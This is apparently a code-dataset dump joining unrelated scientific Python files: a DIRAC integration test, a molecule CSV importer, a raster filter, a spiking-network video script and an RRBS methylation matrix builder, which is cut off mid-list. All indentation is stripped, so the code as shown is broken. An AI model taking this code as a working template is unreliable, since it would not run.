res = self.rmClient.selectPolicyResult('element', 'TestName12345', 'policyName', 'statusType')
# check if the result has changed
self.assertEqual(res['Value'][0][4], 'newStatus')
# TEST deletePolicyResult
# ...............................................................................
res = self.rmClient.deletePolicyResult('element', 'TestName12345', 'policyName', 'statusType')
self.assertTrue(res['OK'])
res = self.rmClient.selectPolicyResult('element', 'TestName12345', 'policyName', 'statusType')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_SpaceTokenOccupancy(self):
"""
SpaceTokenOccupancy table
"""
res = self.rmClient.deleteSpaceTokenOccupancyCache('endpoint', 'token') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifySpaceTokenOccupancy
res = self.rmClient.addOrModifySpaceTokenOccupancyCache('endpoint', 'token', 500.0, 1000.0, 200.0,
datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectSpaceTokenOccupancyCache('endpoint', 'token')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'token'
self.assertEqual(res['Value'][0][1], 'token')
res = self.rmClient.addOrModifySpaceTokenOccupancyCache('endpoint', 'token', free=100.0)
self.assertTrue(res['OK'])
res = self.rmClient.selectSpaceTokenOccupancyCache('endpoint', 'token')
# check if the result has changed
self.assertEqual(res['Value'][0][3], 100.0)
# TEST deleteSpaceTokenOccupancy
# ...............................................................................
res = self.rmClient.deleteSpaceTokenOccupancyCache('endpoint', 'token')
self.assertTrue(res['OK'])
res = self.rmClient.selectSpaceTokenOccupancyCache('endpoint', 'token')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_Transfer(self):
"""
TransferOccupancy table
"""
res = self.rmClient.deleteTransferCache('sourcename', 'destinationname') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyTransferOccupancy
res = self.rmClient.addOrModifyTransferCache('sourcename', 'destinationname', 'metric', 1000.0,
datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectTransferCache('sourcename', 'destinationname')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'destinationname'
self.assertEqual(res['Value'][0][2], 'metric')
res = self.rmClient.addOrModifyTransferCache('sourcename', 'destinationname', value=200.0)
self.assertTrue(res['OK'])
res = self.rmClient.selectTransferCache('sourcename', 'destinationname')
# check if the result has changed
self.assertEqual(res['Value'][0][3], 200.0)
# TEST deleteTransferOccupancy
# ...............................................................................
res = self.rmClient.deleteTransferCache('sourcename', 'destinationname')
self.assertTrue(res['OK'])
res = self.rmClient.selectTransferCache('sourcename', 'destinationname')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(TestClientResourceManagementTestCase)
suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(ResourceManagementClientChain))
testResult = unittest.TextTestRunner(verbosity=2).run(suite)
sys.exit(not testResult.wasSuccessful())
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
|
andresailer/DIRAC
|
tests/Integration/ResourceStatusSystem/Test_ResourceManagement.py
|
Python
|
gpl-3.0
| 12,465
|
[
"DIRAC"
] |
7578ec163952fc6fbe856f5db101f42c33ca08af45baa89e8b4a210f4d5bee90
|
import pybel
import openbabel
import csv
from openmoldbmolecules.models import Molecule
"""
THIS IS OBSOLETE! USE add2db.py
"""
def add_mols(data):
namec = ""
altnamec = ""
suppc = ""
suppidc = ""
storc = ""
storidc = ""
amountc = ""
unitc = ""
casc = ""
altsupplierc = ""
altsupplierIDc = ""
commc = ""
classc = ""
counter = 0
head = data.next()
for c in head:
#Get the indexes of columns
cl = c.lower()
if cl == "name":
namec = counter
elif cl == "altname":
altnamec = counter
elif cl == "supplier":
suppc = counter
elif cl == "supplierid":
suppidc = counter
elif cl == "storage":
storc = counter
elif cl == "storageid":
storidc = counter
elif cl == "amount":
amountc = counter
elif cl == "unit":
unitc = counter
elif cl == "cas":
casc = counter
elif cl == "smiles":
smilesc = counter
elif cl == "supplier2":
altsupplierc = counter
elif cl == "supplierid2":
altsupplierIDc = counter
elif cl == "comment":
commc = counter
elif cl == "molclass":
classc = counter
counter += 1
if type(smilesc) == int or type(namec) == int:
# has to have either smiles or name column
print "Following columns were found and will be imported:"
if type(namec) == int:
print head[namec] + " ",
if type(altnamec) == int:
print head[altnamec] + " ",
if type(suppc) == int:
print head[suppc] + " ",
if type(suppidc) == int:
print head[suppidc] + " ",
if type(storc) == int:
print head[storc] + " ",
if type(storidc) == int:
print head[storidc] + " ",
if type(amountc) == int:
print head[amountc] + " ",
if type(unitc) == int:
print head[unitc] + " ",
if type(casc) == int:
print head[casc] + " ",
if type(smilesc) == int:
print head[smilesc] + " ",
if type(altsupplierc) == int:
print head[altsupplierc] + " ",
if type(altsupplierIDc) == int:
print head[altsupplierIDc] + " ",
if type(commc) == int:
print head[commc] + " ",
if type(classc) == int:
print head[classc] + " ",
print ""
userinput = raw_input("Is this ok? yes/no: ")
#Check with user if everything looks OK
if userinput == "yes":
for line in data:
#do some datachecks and encode in ACSII since some databases have problems with UTF-8
if type(namec) == int:
name = line[namec].decode("windows-1252").encode('utf-8','ignore')
else:
name = ""
if type(altnamec) == int:
altname = line[altnamec].decode("windows-1252").encode('utf-8','ignore')
else:
altname = ""
if type(suppc) == int:
supp = line[suppc].decode("windows-1252").encode('utf-8','ignore')
else:
supp = ""
if type(suppidc) == int:
suppid = line[suppidc].decode("windows-1252").encode('utf-8','ignore')
else:
suppid = ""
if type(storc) == int:
storage = line[storc].decode("windows-1252").encode('utf-8','ignore')
else:
storage = ""
if type(storidc) == int:
storageid = line[storidc].decode("windows-1252").encode('utf-8','ignore')
else:
storageid = ""
if type(amountc) == int:
amount = line[amountc]
else:
amount = ""
if type(unitc) == int:
unit = line[unitc].decode("windows-1252").encode('utf-8','ignore')
else:
unit = ""
if type(casc) == int:
cas = line[casc].decode("windows-1252").encode('utf-8','ignore')
else:
cas = ""
if type(smilesc) == int:
smiles = line[smilesc].decode("windows-1252").encode('utf-8','ignore')
else:
smiles = ""
if type(altsupplierc) == int:
altsupplier = line[altsupplierc].decode("windows-1252").encode('utf-8','ignore')
else:
altsupplier = ""
if type(altsupplierIDc) == int:
altsupplierID = line[altsupplierIDc].decode("windows-1252").encode('utf-8','ignore')
else:
altsupplierID = ""
if type(commc) == int:
comm = line[commc].decode("windows-1252").encode('utf-8','ignore')
else:
comm = ""
if type(classc) == int:
molclass = line[classc].decode("windows-1252").encode('utf-8','ignore')
else:
molclass = ""
try:
amount = float(line[amountc])
unit = line[unitc]
except:
amount = 0
unit = "X"
try:
mol = pybel.readstring("smi",smiles)
descs = mol.calcdesc()
#generate 2D coordinates, needs openbabel
obConversion = openbabel.OBConversion()
obConversion.SetInAndOutFormats("smi", "mdl")
obmol = openbabel.OBMol()
obConversion.ReadString(obmol, smiles)
gen2d = openbabel.OBOp.FindType("gen2d")
gen2d.Do(obmol)
MDL = obConversion.WriteString(obmol)
outMDL = MDL.replace("\n", r"\n")
CMW=descs["MW"]
CHN=mol.formula
HBA=descs["HBA1"]
HBD=descs["HBD"]
logP=descs["logP"]
tpsa=descs["TPSA"]
#Get number of rotatable bonds
smarts = pybel.Smarts("[!$([NH]!@C(=O))&!D1&!$(*#*)]\&!@[!$([NH]!@C(=O))&!D1&!$(*#*)]")
rb = smarts.findall(mol)
nrb = len(rb)
#Calculate Fsp3
sp3c = pybel.Smarts("[CX4]")
nsp3c = sp3c.findall(mol)
nsp3c = float(len(nsp3c))
allc = pybel.Smarts("[#6]")
nallc = allc.findall(mol)
nallc = float(len(nallc))
if nallc > 0:
fsp3 = nsp3c/nallc
print fsp3
else:
fsp3 = ""
#Get fingerprint and molecular complexity
fprint = mol.calcfp()
bitson = fprint.bits
nbitson = len(bitson)
print name
m = Molecule(name=name,SMILES=smiles, altname=altname, supplier=supp, supplierID=suppid, CMW=descs["MW"], CHN=CHN, HBA=HBA, HBD=HBD, logP=logP, tpsa=tpsa, amount=amount, unit=unit, CAS=cas, storage=storage, storageID=storageid, molfile=outMDL, nrb=nrb, fingerprint=bitson, complexity=nbitson, altsupplier=altsupplier, altsupplierID=altsupplierID , comment=comm, molclass=molclass, fsp3=fsp3)
m.save()
except:
m = Molecule(name=name,SMILES=smiles, altname=altname, supplier=supp, supplierID=suppid, amount=amount, unit=unit, CAS=cas, storage=storage, storageID=storageid, altsupplier=altsupplier, altsupplierID=altsupplierID , comment=comm, molclass=molclass)
m.save()
#Save data to database
else:
print "Exiting, no changes were made..."
return False
else:
print "No valid columns were found in the table"
if __name__ == '__main__':
import sys
datacard = sys.argv[1]
data = csv.reader(open(datacard), dialect='excel')
add_mols(data)
|
samoturk/openmolDB
|
managemols.py
|
Python
|
bsd-3-clause
| 8,833
|
[
"Pybel"
] |
f99466187cce69628286e8c67225b4a1349ef8c7818c8cdd9188325470e5293d
|
#!/usr/bin/env python3
import sys
import argparse
import numpy as np
from mapTools import *
from utilities import filesFromList, writeLog
from plotTools import addImagePlot, addScatterPlot
import matplotlib.pyplot as plt
'''
Description:
Author: Mikko Auvinen
mikko.auvinen@fmi.fi
Finnish Meteorological Institute
'''
#==========================================================#
parser = argparse.ArgumentParser(prog='processDomain.py')
parser.add_argument("-f", "--filename",type=str, help="Name of the comp domain data file.")
parser.add_argument("-fo", "--fileout",type=str, help="Name of output Palm topography file.")
parser.add_argument("-i0","--iZero", help="Pixel ids [N,E] for the zero level.",\
type=int,nargs=2,default=[None,None])
parser.add_argument("-na", "--nansAbove", type=float, default=None,\
help="Replace values above given threshold by <nans> (i.e. fill values). Default=None")
parser.add_argument("-nb", "--nansBelow", type=float, default=None,\
help="Replace values below given threshold by <nans> (i.e. fill values). Default=None")
parser.add_argument("-mw","--mrgnW", help="Zero or non-zero margin widths as ratios (0-1): [L,R,B,T]",\
type=float,nargs=4,default=[None,None,None,None])
parser.add_argument("-mr","--mrgnR", help="Margin ramp widths as ratios (0-1): [L,R,B,T]",\
type=float,nargs=4,default=[None,None,None,None])
parser.add_argument("-mh","--mrgnH", help="Margins heights: [L,R,B,T]. Default=0",\
type=float,nargs=4,default=[0.,0.,0.,0.])
helpFlt = ''' Filter type and its associated number. Available filters:
median, percentile, rank, gaussian, local. Entering \"user, num\" allows the user
to specify <num> different filters consecutively.
Example entry: median 5'''
parser.add_argument("-ft","--filter",type=str,nargs=2,default=[None,None], help=helpFlt)
parser.add_argument("-rx","--rmax", type=float, default=None,\
help="Recover peaks (after filtering) above given value.")
parser.add_argument("-hx","--hmax", type=float, default=None,\
help="Maximum allowable height.")
parser.add_argument("-p", "--printOn", action="store_true", default=False,\
help="Print the resulting raster data.")
parser.add_argument("-pp", "--printOnly", help="Only print the resulting data. Don't save.",\
action="store_true", default=False)
args = parser.parse_args()
writeLog( parser, args, args.printOnly )
#==========================================================#
filename= args.filename
fileout = args.fileout
na = args.nansAbove
nb = args.nansBelow
i0 = args.iZero # Rename
mw = args.mrgnW
mr = args.mrgnR
mh = args.mrgnH
flt = args.filter
hmax = args.hmax
rmax = args.rmax
printOn = args.printOn
printOnly = args.printOnly
# Test comment
# Another one
if( flt[0] == None): fltStr = ' '
else: fltStr = flt[0]+'-filtered: '
# Read the raster tile to be processed.
Rdict = readNumpyZTile(filename)
R = Rdict['R']
Rdims = np.array(np.shape(R))
ROrig = Rdict['GlobOrig']
print(' Rdims = {} '.format(Rdims))
print(' ROrig = {} '.format(ROrig))
# Set the zero level according to the given pixel value.
if(i0.count(None) == 0):
print(' Zero Level: {} '.format(R[i0[0],i0[1]]))
R0 = R[i0[0],i0[1]]
R -= R0
R[R<0.] = 0.
R = applyMargins( R , mw, mr, mh )
# Apply desired filters.
Rf = np.zeros( np.shape(R) , float)
Rf = filterAndScale(Rf, R, flt )
# Apply nans where fill values are desired.
Rf = replaceByNans( Rf, na, nb)
if( rmax is not None ):
idv = (Rf > rmax)
Rf[idv] = np.maximum( Rf[idv], R[idv] )
if( hmax ):
Rf = np.minimum( hmax , Rf )
Rdict['R'] = Rf; Rdict['GlobOrig'] = ROrig
if( not args.printOnly ):
saveTileAsNumpyZ( fileout, Rdict )
if( args.printOn or args.printOnly ):
figDims = 13.*(Rdims[::-1].astype(float)/np.max(Rdims))
#print('Sum = {}'.format(np.sum(Rf)))
fig = plt.figure(num=1, figsize=figDims)
fig = addImagePlot( fig, Rf, fltStr+fileout )
plt.show()
R = Rf = None
|
mjsauvinen/P4UL
|
pyRaster/processDomain.py
|
Python
|
mit
| 3,976
|
[
"Gaussian"
] |
5798d6aec854308400111111ed30683bab23bce4ef14e8c0e15fc6336bc2c424
|
#!/bin/ipython
# ---LICENSE-BEGIN - DO NOT CHANGE OR MOVE THIS HEADER
# This file is part of the Neurorobotics Platform software
# Copyright (C) 2014,2015,2016,2017 Human Brain Project
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# ---LICENSE-END
import numpy as np
import cv2
import pyNN.nest as sim
import pathlib as plb
import time
import common as cm
import network as nw
import visualization as vis
args = cm.parse_args()
# Train weights
weights_dict, feature_imgs_dict = nw.train_weights(args.feature_dir)
# Open the video capture and writer objects
cap = cv2.VideoCapture(args.target_name)
cap_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
cap_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
writer = cv2.VideoWriter('video_S1_reconstructions/{}.avi'.format(\
plb.Path(args.target_name).stem),
int(cap.get(cv2.CAP_PROP_FOURCC)),
cap.get(cv2.CAP_PROP_FPS), (cap_width, cap_height),
isColor=False)
sim.setup(threads=4, spike_precision='on_grid')
# Set up the network
layer_collection = {} # layer name -> dict of S1 layers of type
# 'scale -> layer list'
layer_collection['input'] = nw.create_input_layers_for_scales(\
np.zeros((cap_height, cap_width)), args.scales)
layer_collection['S1'] = nw.create_S1_layers(layer_collection['input'],
weights_dict, args)
nw.create_cross_layer_inhibition(layer_collection['S1'])
# We build only the S1 layer for the moment, to speed up the simulation time
for layers in layer_collection['S1'].values():
for layer in layers:
layer.population.record('spikes')
# The actual frame-by-frame simulation and input neuron updating
t1 = time.clock()
#for i in range(int(cap.get(cv2.CAP_PROP_FRAME_COUNT))):
for i in range(args.frames):
t2 = time.clock()
img = cap.read()[1]
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# It's assumed that the image is already filtered, so no filtering is
# required
nw.change_rates_for_scales(layer_collection['input'], img)
sim.run(50)
# Refresh the current spike counts
for layers in layer_collection['S1'].values():
for layer in layers:
layer.update_spike_counts()
reconstructed_img = vis.create_S1_feature_image(img, layer_collection,
feature_imgs_dict, args)[1]
reconstructed_img = cv2.convertScaleAbs(reconstructed_img)
writer.write(reconstructed_img)
print('Frame', i, 'took', time.clock() - t2, 's to finish')
print('Processing', args.frames, 'frames took', time.clock() - t1, 's')
cap.release()
writer.release()
sim.end()
|
roberthangu/snn_object_recognition
|
video-test.py
|
Python
|
gpl-2.0
| 3,417
|
[
"NEURON"
] |
be0be512000af8173a4887523a103100bbae7afcd17837612c4817b2ee17ef25
|
import glob
import pandas as pd
import numpy as np
pd.set_option('display.max_columns', 50) # print all rows
import os
os.chdir("/gpfs/commons/home/biederstedte-934/evan_projects/correct_phylo_files")
normalB = glob.glob("binary_position_RRBS_normal_B_cell*")
mcell = glob.glob("binary_position_RRBS_NormalBCD19pCD27mcell*")
pcell = glob.glob("binary_position_RRBS_NormalBCD19pCD27pcell*")
cd19cell = glob.glob("binary_position_RRBS_NormalBCD19pcell*")
print(len(normalB))
print(len(mcell))
print(len(pcell))
print(len(cd19cell))
totalfiles = normalB + mcell + pcell + cd19cell
print(len(totalfiles))
df_list = []
for file in totalfiles:
df = pd.read_csv(file)
df = df.drop("Unnamed: 0", axis=1)
df["chromosome"] = df["position"].map(lambda x: str(x)[:5])
df = df[df["chromosome"] == "chr14"]
df = df.drop("chromosome", axis=1)
df_list.append(df)
print(len(df_list))
total_matrix = pd.concat([df.set_index("position") for df in df_list], axis=1).reset_index().astype(object)
total_matrix = total_matrix.drop("index", axis=1)
len(total_matrix.columns)
total_matrix.columns = ["RRBS_normal_B_cell_A1_24_TAAGGCGA.ACAACC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.ACCGCG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.ACGTGG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.AGGATG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.ATAGCG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.ATCGAC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CAAGAG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CATGAC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CGGTAG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CTATTG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CTCAGC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GACACG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GCTGCC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GGCATC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GTGAGG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GTTGAG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.TAGCGG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.TATCTC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.TCTCTG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.TGACAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.ACAACC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.ACCGCG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.ACTCAC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.ATAGCG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CAAGAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CATGAC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CCTTCG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CGGTAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CTATTG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CTCAGC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GACACG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GCATTC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GGCATC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GTGAGG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GTTGAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TAGCGG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TATCTC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TCTCTG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TGACAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TGCTGC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ACAACC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ACCGCG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ACGTGG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ACTCAC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.AGGATG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ATAGCG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ATCGAC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.CAAGAG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.CATGAC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.CGGTAG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.CTATTG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GACACG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GCATTC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GCTGCC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GGCATC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GTGAGG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GTTGAG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.TAGCGG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.TATCTC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ACAACC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ACCGCG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ACGTGG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ACTCAC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.AGGATG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ATCGAC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CAAGAG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CATGAC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CCTTCG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CGGTAG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CTATTG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CTCAGC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GACACG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GCATTC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GCTGCC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GGCATC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GTTGAG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.TAGCGG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.TATCTC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ACAACC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ACCGCG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ACGTGG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ACTCAC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.AGGATG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ATAGCG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ATCGAC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CAAGAG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CATGAC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CGGTAG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CTATTG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CTCAGC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GACACG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GCATTC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GCTGCC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GGCATC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GTGAGG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.TAGCGG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.TATCTC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.ACCGCG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.ACGTGG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.ACTCAC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.AGGATG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.ATCGAC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CAAGAG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CATGAC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CCTTCG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CTATTG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CTCAGC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GCATTC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GCTGCC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GGCATC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GTGAGG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GTTGAG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.TCTCTG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ACCGCG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ACGTGG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ACTCAC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ATAGCG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ATCGAC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CAAGAG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CATGAC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CCTTCG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CTATTG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CTCAGC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GACACG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GCATTC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GCTGCC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GGCATC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GTGAGG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GTTGAG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.TAGCGG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.TATCTC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ACAACC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ACCGCG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ACGTGG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ACTCAC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.AGGATG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ATAGCG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ATCGAC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CAAGAG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CATGAC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CCTTCG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CGGTAG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CTATTG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CTCAGC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.GACACG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.GCATTC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.GTGAGG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.GTTGAG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.TATCTC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.TCTCTG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ACAACC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ACGTGG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ACTCAC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.AGGATG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ATAGCG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ATCGAC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CAAGAG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CATGAC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CCTTCG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CGGTAG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CTATTG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CTCAGC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.GACACG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.GTGAGG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.TAGCGG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.TATCTC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.TCTCTG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ACAACC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ACCGCG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ACGTGG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ACTCAC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.AGGATG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ATAGCG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ATCGAC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CAAGAG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CATGAC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CCTTCG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CGGTAG",
